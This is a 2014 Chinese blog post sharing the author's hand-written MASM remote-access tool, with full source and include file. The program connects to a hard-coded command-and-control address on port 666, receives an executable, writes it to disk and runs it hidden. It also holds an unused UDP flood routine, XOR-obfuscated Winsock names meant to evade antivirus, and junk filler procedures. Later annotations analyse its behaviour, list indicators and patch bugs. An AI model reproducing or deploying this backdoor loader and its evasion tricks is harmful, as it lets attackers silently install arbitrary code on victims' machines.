自己前几天用MASM写的一个远控

发布于 2014-11-21  876 次阅读


最先是在看雪发的 新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西,虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的

include androidprotect.inc
.code
; Hard-coded command-and-control host, resolved in `start` through
; m_gethostbyname (which accepts a dotted quad or a host name).
; 192.168.0.101 is an RFC 1918 private address, i.e. a lab machine; the
; commented-out line shows a domain that was used in its place at some point.
dipx byte "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc
; Empty procedure ("ganrao" = interference): a single ret, never called
; from the code visible in this file. One of several such fillers
; (ganraoy, ganraox, ganraoxx, ganrao) that add bytes to the image but
; take no part in the program's logic.
ret

ganraoz endp
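_CalcCheckSum proc _lpsz,_dwSize
;-----------------------------------------------------------------------
; WORD _CalcCheckSum(const void *_lpsz, DWORD _dwSize)
; Ones'-complement checksum (RFC 1071 style, the form used by IP/ICMP
; headers): sums the buffer as little-endian 16-bit words, adds a trailing
; odd byte as the low byte of one more word, folds the 32-bit sum into
; 16 bits and returns the complement.
; ABI:   stdcall, 32-bit. All general registers restored by pushad/popad.
; In:    _lpsz   = buffer pointer
;        _dwSize = byte count (0 is allowed and yields 0FFFFh)
; Out:   eax = checksum, zero-extended (bits 16..31 clear)
; Clobb: flags
; Changes vs. the original: a size below 2 no longer enters the word loop
; with ecx = 0 (which made `loop` run 2^32 times); the fold is applied a
; second time so a carry out of the first fold is not lost; the result is
; zero-extended instead of leaving that carry in bit 16 of eax.
; Not referenced anywhere else in this file.
;-----------------------------------------------------------------------

local @dwSize

pushad

mov esi,_lpsz                   ; esi = read cursor
cld                             ; lodsw/lodsb move forward
xor ebx,ebx                     ; ebx = 32-bit running sum
mov ecx,_dwSize
shr ecx,1                       ; ecx = number of whole 16-bit words
jz cs_odd                       ; none: go straight to the odd-byte check

cs_word:
lodsw
movzx eax,ax
add ebx,eax
dec ecx                         ; dec/jnz rather than the microcoded loop instruction
jnz cs_word

cs_odd:
test _dwSize,1
jz cs_fold
lodsb                           ; trailing byte counts as the low byte of a word
movzx eax,al
add ebx,eax

cs_fold:
mov eax,ebx
and eax,0ffffh
shr ebx,16
add eax,ebx                     ; first fold: low 16 + high 16, may reach 1FFFEh
mov ebx,eax
shr ebx,16
and eax,0ffffh
add eax,ebx                     ; second fold: add the carry back in; result <= 0FFFFh
not ax
movzx eax,ax                    ; complement of the low 16 bits, upper bits clear
mov @dwSize,eax                 ; stash the result so popad can restore everything else

popad
mov eax,@dwSize

ret
_CalcCheckSum endp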
udpattack proc
;-----------------------------------------------------------------------
; UDP send loop. Opens a datagram socket, resolves udpip, copies udpbuf
; (a DWORD holding 0) into SO_SNDBUF and then, while the byte uptrue is 1,
; sends the current tick count as decimal text to udpip:udpport as fast
; as sendto returns. Nothing in this file calls udpattack, writes udpip or
; udpport, or clears uptrue, so in this listing it is unreachable code
; whose loop has no exit.
; Clobbers: eax, ecx, edx and the globals udpsock, udpSin, udpbuff.
;-----------------------------------------------------------------------
invoke m_socket,AF_INET, SOCK_DGRAM, 17          ; 17 = IPPROTO_UDP written as a literal
mov udpsock,eax                                  ; not checked against INVALID_SOCKET
mov udpSin.sin_family, AF_INET
invoke gethtons,udpport
mov udpSin.sin_port,ax
invoke m_gethostbyname,offset udpip              ; result not checked for NULL
mov eax,[eax+12]                                 ; hostent->h_addr_list
mov eax,[eax]                                    ; first address entry
mov eax,[eax]                                    ; the 32-bit IPv4 address
invoke m_inet_ntoa,eax                           ; round trip through dotted-quad text ...
invoke m_inet_addr,eax                           ; ... and back to a network-order DWORD
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf   ; optval = udpbuf = 0
.while byte ptr [uptrue]==1                      ; uptrue is never cleared in this file
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff                  ; udpbuff = tick count as text (see dwtoa for the sign quirk)
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret

udpattack endp

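stringtodw proc string:dword,strsiz:dword
;-----------------------------------------------------------------------
; DWORD stringtodw(const char *string, DWORD strsiz)
; date: 2014/12/23  purpose: decimal digit string -> DWORD  author: 落笔飞花笑百生
; Reads at most strsiz bytes from string, stopping early at a NUL, and
; accumulates value = value * 10 + (byte - '0'). No sign handling, no
; overflow check and no check that the bytes are digits (as before).
; ABI:   stdcall. ebx/esi/edi are now saved and restored; the original
;        clobbered all three, which stdcall callers may rely on.
; In:    string = character pointer, strsiz = maximum bytes to read
; Out:   eax = parsed value; 0 for strsiz = 0 or an empty string
; Clobb: ecx, flags
; Change vs. the original: strsiz = 0 returns 0 instead of entering `loop`
; with ecx = 0 (2^32 iterations bounded only by a NUL byte).
;-----------------------------------------------------------------------
push ebx
push esi
push edi

mov edi,string                  ; edi = read cursor
xor ebx,ebx                     ; ebx = accumulated value
mov ecx,strsiz
jecxz sd_done                   ; nothing to read

sd_next:
movzx esi,byte ptr [edi]        ; esi = current character
test esi,esi
jz sd_done                      ; NUL ends the number early
lea eax,[ebx+ebx*4]             ; eax = 5 * value
lea ebx,[esi+eax*2-30h]         ; value = 10 * value + (ch - '0')
inc edi
dec ecx
jnz sd_next

sd_done:
mov eax,ebx
pop edi
pop esi
pop ebx
ret
stringtodw endp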
xorstring proc dstring,dsize:dword
; In-place decode of one obfuscated API-name string from .data: xors
; bytes 1..dsize of dstring with 5. Byte 0 is left unchanged (the header
; comment says the first character is stored in clear), and because eax
; is incremented before the first xor the last byte touched is
; dstring[dsize] — one past the string when dsize is its `sizeof`, as every
; caller passes. That byte is the two-byte zero pad (xa .. xm) that follows
; each encoded string in .data, which is why the overrun has no visible
; effect. The stored terminator is 05h and decodes to 0.
; In:   dstring = string address, dsize = byte count (0 would loop 2^32 times)
; Out:  eax = dstring + dsize, ecx = 0
; Clobbers: eax, ecx, flags
mov eax,dstring
mov ecx,dsize
@@:
inc eax                         ; advance first, so byte 0 is skipped
xor byte ptr [eax],5

loop @B

ret
xorstring endp
gethtons proc port :dword
; WORD gethtons(DWORD port) — host-to-network byte order for a 16-bit port
; (the same swap ws2_32!htons performs, done locally).
; In:   port = port number in the low 16 bits; the upper 16 bits are ignored
; Out:  eax = the two low bytes exchanged, zero-extended to 32 bits
; Clobbers: flags

movzx eax,word ptr port         ; keep only the low 16 bits, upper half of eax cleared
rol ax,8                        ; exchange al and ah; the zeroed upper half is untouched
ret

gethtons endp

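midstr proc a,b,cc,d:dword
;-----------------------------------------------------------------------
; void midstr(const char *a, char *b, DWORD cc, DWORD d)
; Copies the bytes a[cc .. d-1] (d - cc of them) to b. No NUL terminator
; is written and b is not bounds-checked; callers in this file zero the
; destination beforehand and size it themselves.
; ABI:   stdcall; ebx/esi/edi preserved.
; In:    a = source, b = destination, cc = start offset, d = end offset
; Out:   eax = d - cc (incidental, as in the original; not used by callers)
; Clobb: ecx, flags, DF cleared
; Fixes vs. the original: esi and edi were pushed as esi, edi but popped
; as esi, edi in that same order — i.e. the caller got them back swapped;
; ebx was clobbered without being saved (no longer used at all); and
; d <= cc produced a wrapped count and a multi-gigabyte rep movsb instead
; of copying nothing.
;-----------------------------------------------------------------------
push esi
push edi

mov eax,d
sub eax,cc                      ; eax = byte count; CF/ZF tell us whether it is valid
jbe ms_done                     ; d <= cc: empty range, leave b untouched
mov ecx,eax
mov esi,a
add esi,cc                      ; esi = &a[cc]
mov edi,b
cld
rep movsb

ms_done:
pop edi
pop esi
ret

midstr endp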
ganraoy proc
; Empty filler procedure (single ret), never called from the visible code;
; see ganraoz.

ret

ganraoy endp

start proc
;-----------------------------------------------------------------------
; Worker-thread body; winmain starts it with CreateThread. What the code
; below does, for anyone analysing the sample:
;   1. getproaddress decodes the API-name strings, enforces the single-
;      instance mutex and resolves the ws2_32 exports into the m_* pointers.
;   2. Connects a TCP socket to dipx:dport (dport = 666) and blocks in
;      recv. When recv returns 0 or an error the socket is closed, the
;      thread sleeps 10 s and reconnects; CLOSE is never set to TRUE in
;      this file, so the outer .repeat loop never ends.
;   3. A packet beginning "XZ" (case-insensitive) announces a file size:
;      the digits after the marker are parsed into dFileSize and "GETPE!"
;      is sent back. A packet beginning "MZ" is the first block of a PE
;      file: it is written to <cwd>\<GetTickCount>.exe, further recv
;      blocks are appended until GetFileSize equals dFileSize, the file
;      is launched with WinExec(SW_HIDE) and "FILECSWB!" is sent back.
; The dropped-file naming, the two markers, the two reply strings, the
; port and the mutex name are the static indicators this sample leaves.
;-----------------------------------------------------------------------
; entry of the thread
invoke GetCommandLine           ; result in eax is discarded
call $+5                        ; pushes a return address and falls through to the next
call $+5                        ; instruction; the three dwords pushed here are never
call $+5                        ; popped — harmless only because this proc never returns

jmp xaxa                        ; jump to the next instruction: no effect
xaxa:
call getproaddress              ; string decode, mutex check, ws2_32 resolution
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET         ; on failure hSock keeps its old value and recv is still attempted on it

mov hSock,eax
mov Sin.sin_family, AF_INET
invoke gethtons,dport           ; dport = 666, swapped to network order
mov Sin.sin_port,ax
invoke m_gethostbyname,offset dipx   ; result not checked for NULL
mov eax,[eax+12]                ; hostent->h_addr_list
mov eax,[eax]                   ; first address entry
mov eax,[eax]                   ; the 32-bit IPv4 address
invoke m_inet_ntoa,eax          ; round trip through dotted-quad text ...
invoke m_inet_addr,eax          ; ... and back to a network-order DWORD
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin   ; return value not checked

.endif
recvloop:
; flag and recvbuff are zeroed so the 2-byte marker midstr copies below is NUL-terminated
invoke RtlZeroMemory,offset flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0 &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR   ; leaves the loop on 0 (peer closed) or SOCKET_ERROR
invoke midstr,offset recvbuff,offset flag,0,2   ; flag = first two bytes of the packet
invoke lstrcmpi,offset flag,offset xz           ; "XZ": size announcement
cmp eax,0
je xxz
invoke midstr,offset recvbuff,offset flag,0,2   ; same copy again (redundant)
invoke lstrcmpi,offset flag,offset pe           ; "MZ": first block of a PE file
cmp eax,0
je fuckfile
jmp recvloop                    ; unknown marker: discard the packet and wait again
; write out the PE file
fuckfile:
invoke GetCurrentDirectory,260,offset currd     ; currd = cwd (260-byte buffer)
invoke GetTickCount
invoke dwtoa,eax,offset filename                ; filename = tick count as text (may carry '-', see dwtoa)
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang      ; currd = cwd + "\" + filename; no length check on the
invoke lstrcat,offset currd,offset filename     ; 260-byte buffer
; the name and path of the file to write are now complete
invoke DeleteFile,offset currd                  ; remove any earlier file of that name
; the buffer starts with "MZ", i.e. the DOS header
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax                             ; not checked against INVALID_HANDLE_VALUE
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL   ; writes all 1024 bytes, not the recv count
loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0   ; return value (count / error) is ignored
invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END    ; append
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL   ; again the full 1024 bytes
invoke GetFileSize,hfilehandle,NULL
mov writebytes,eax
; The file only ever grows in 1024-byte steps, so this exact match is reached only when
; the announced size is a multiple of 1024; otherwise the loop keeps appending (zero-filled
; when recv fails) blocks indefinitely.
cmp eax,dword ptr [dFileSize]
je close
jmp loopwrite

close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0; reset the announced size
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE; run the dropped file, hidden, once the transfer is complete
invoke m_send,hSock,offset filecs,sizeof filecs,0   ; ack "FILECSWB!"
jmp recvloop; back to waiting for the next packet
xxz:
invoke lstrlen,offset recvbuff
; Copies (length - 2) digit bytes into dFileSize, a 4-byte slot: more than four digits
; run past it into the variables that follow in .data.
invoke midstr,offset recvbuff,offset dFileSize,2,eax
invoke lstrlen,offset dFileSize                 ; relies on a zero byte after the digits
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax                   ; the digits are now replaced by the binary value
invoke m_send,hSock,offset getpe,sizeof getpe,0 ; reply "GETPE!": request the file
jmp recvloop
.endw                           ; not reached: every path above jumps to recvloop

invoke m_closesocket,hSock      ; recv returned 0 / error: drop the socket and retry after 10 s
invoke Sleep,10000
.until CLOSE==TRUE              ; CLOSE is never written in this file, so this repeats forever
invoke m_WSACleanup             ; unreachable; note there is no ret before endp

start endp
winmain proc
; Program entry point (named in `end winmain`). Starts `start` on a new
; thread with no argument and returns immediately; nothing waits on the
; thread. The process presumably stays alive on the strength of that
; thread alone (its reconnect loop never ends) — verify how the loader
; treats an entry point that returns before relying on this.
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL; start the implant ("small horse") thread
ret

winmain endp
dwtoa proc dwValue:DWORD, lpBuffer:DWORD
;-----------------------------------------------------------------------
; void dwtoa(DWORD dwValue, char *lpBuffer)
; Integer to decimal ASCII, NUL-terminated, into lpBuffer (no bounds
; check; 12 bytes suffice). dwValue is treated as SIGNED: when bit 31 is
; set a '-' is written and the value negated, so the GetTickCount()
; values the callers in this file pass come out with a '-' once the tick
; count exceeds 2^31. Division by 10 is a reciprocal multiply.
; Clobbers: eax, ecx, edx, flags. ebx/esi/edi are saved and restored.
;-----------------------------------------------------------------------

nop                             ; eight nops: padding, no effect on the result
nop
nop
nop
nop
nop
nop
nop

push ebx
push esi
push edi

mov eax, dwValue
mov edi, [lpBuffer]             ; edi = write cursor

or eax,eax                      ; sets ZF and SF for the two tests below
jnz sign

zero:
mov word ptr [edi],30h          ; value 0: one 16-bit store writes "0" and the NUL
jmp dw2asc

sign:
jns pos                         ; SF still from the `or`: negative -> emit '-' and negate
mov byte ptr [edi],'-'
neg eax
inc edi

pos:
mov ecx,429496730               ; ~= 2^32 / 10, the reciprocal used for division by 10
mov esi, edi                    ; esi = first digit position, for the reversal below

.while (eax > 0)                ; MASM compares a bare register unsigned: runs until eax == 0
mov ebx,eax
mul ecx                         ; edx = eax / 10 (high half of the 64-bit product)
mov eax,edx
lea edx,[edx*4+edx]
add edx,edx                     ; edx = quotient * 10
sub ebx,edx                     ; ebx = remainder = next digit, least significant first
add bl,'0'
mov [edi],bl
inc edi
.endw

mov byte ptr [edi], 0 ; terminate the string

; We now have all the digits, but in reverse order.

.while (esi < edi)              ; swap from both ends until the cursors meet
dec edi
mov al, [esi]
mov ah, [edi]
mov [edi], al
mov [esi], ah
inc esi
.endw

dw2asc:
pop edi
pop esi
pop ebx
ret
dwtoa endp
ganraox proc
; No-op filler ("ganrao" = interference): balanced push/pop pairs and a
; self-move. Not called from the visible code.
push eax
push eax
pop eax
pop eax
mov eax,eax
ret
ganraox endp
ganraoxx proc
; Same no-op filler as ganraox.
push eax
push eax
pop eax
pop eax
mov eax,eax
ret
ganraoxx endp
getproaddress proc
;-----------------------------------------------------------------------
; Resolve the API addresses. Each Winsock name is first decoded in place
; (xorstring), then looked up with LoadLibrary/GetProcAddress into the
; matching m_* pointer, so ws2_32 does not appear in the import table.
; Between the two steps a named mutex enforces a single running instance:
; if it already exists the process exits. For an analyst the decoded
; names and the mutex name "bixanhuxakai" are what a memory dump or an
; API trace will show. LoadLibrary is called once per symbol and never
; paired with FreeLibrary (only the reference count grows).
; Clobbers: eax, ecx, edx, flags; writes every m_* pointer and mxhand.
;-----------------------------------------------------------------------
invoke xorstring,offset ws32dll,sizeof ws32dll
invoke xorstring,offset wstp,sizeof wstp
invoke xorstring,offset sock,sizeof sock
invoke xorstring,offset getby,sizeof getby
invoke xorstring,offset inoa,sizeof inoa
invoke xorstring,offset inaddr,sizeof inaddr
invoke xorstring,offset cont,sizeof cont
invoke xorstring,offset recvx,sizeof recvx
invoke xorstring,offset colses,sizeof colses
invoke xorstring,offset wcl,sizeof wcl
invoke xorstring,offset sed,sizeof sed
invoke xorstring,offset sot,sizeof sot
invoke xorstring,offset sendtot,sizeof sendtot
; the calls above decode the strings
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")   ; $TA0 comes from Strings.mac
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand                     ; passes the ADDRESS of mxhand, not the handle value
mov mxhand,0
invoke ExitProcess,NULL                              ; second instance: exit
.endif
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret
getproaddress endp
ganrao proc
; Empty filler procedure, never called from the visible code.
ret
ganrao endp
; entry point is winmain
end winmain
下面是INC文件
; ---- androidprotect.inc (the include file pulled in at the top of the .asm) ----
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
; absolute path from the author's machine; supplies the $TA0 / $CTA0 string macros
include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac
; Prototype + pointer typedef pairs for the ws2_32 exports resolved at run time
; (all arguments typed as plain dwords; stdcall from .model).
_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
; forward declarations for procs used before their definition
getproaddress proto
dwtoa proto :dword,:dword
gethtons proto:dword
; uninitialised data
.data?
currd byte 260 dup (?)          ; current directory, then the full path of the dropped file
filename byte 50 dup (?)        ; "<tick count>.exe"
ipsize byte 50 dup (?)          ; unused in the visible code
recvbuff byte 1024 dup (?); 1 KB receive buffer
Sin sockaddr_in <>              ; C2 address, filled in start
;UDP
; State for udpattack. Nothing in the visible code writes udpip, udpport
; or uptrue, and udpattack itself is never called.
udpSin sockaddr_in <>           ; sendto target
udpbuff byte 200 dup(?)         ; tick count as text, the payload sent
udpbuf dd 00                    ; passed as the SO_SNDBUF option value (0)
udpport dd 00
udpip byte 50 dup (?)
udpsock dd 00
uptrue byte 01h                 ; loop flag: 1 = keep sending
;UDP
WSAData WSADATA <>              ; filled by WSAStartup
; ws2_32 function pointers, filled by getproaddress at run time.
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00               ; handle of the file being dropped (start)
writebytes dd 00                ; last GetFileSize result
oldwritebytes dd 00             ; lpNumberOfBytesWritten for WriteFile
dFileSize dd 00                 ; announced size of the incoming file; also used as the digit buffer (4 bytes only)
mxhand dd 00                    ; single-instance mutex handle
xz byte "XZ",0                  ; packet marker: file-size announcement
pe byte "MZ",0                  ; packet marker: first block of a PE file
flag byte 5 dup (?)             ; 2-byte marker copied from recvbuff; NUL-terminated by the preceding RtlZeroMemory
dport dword 666                 ; C2 TCP port, host order (gethtons swaps it)
CLOSE BOOL FALSE                ; never set to TRUE in this file
filecs byte "FILECSWB!",0       ; reply sent after the dropped file was launched
getpe byte "GETPE!",0           ; reply sent after a size announcement
xiegang byte "\",0              ; path separator ("xiegang" = slash)
hSock dd 00                     ; C2 socket
datalengh dd 00                 ; unused in the visible code
; Obfuscated Winsock names: byte 0 in clear, bytes 1..n xor 5, terminator
; stored as 05h (see xorstring). Each is followed by a two-byte zero pad
; (xa .. xm) that absorbs xorstring's one-byte overrun. Each decodes to the
; export that getproaddress stores in the m_* pointer of the same name.
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h   ; the Winsock DLL name
xa byte 00,00
wstp byte 0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h

xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h

xe byte 00,00
inaddr byte 0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h

xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h

xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h

xh byte 00,00
colses byte 0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h

xi byte 00,00
wcl byte 0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h

xj byte 00,00
sed byte 0073h, 0060h, 006Bh, 0061h, 0005h

xk byte 00,00
sot byte 073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h
xl byte 00,00
sendtot byte 073h,060h,06Bh,061h,071h,06Ah,005h
xm byte 00,00
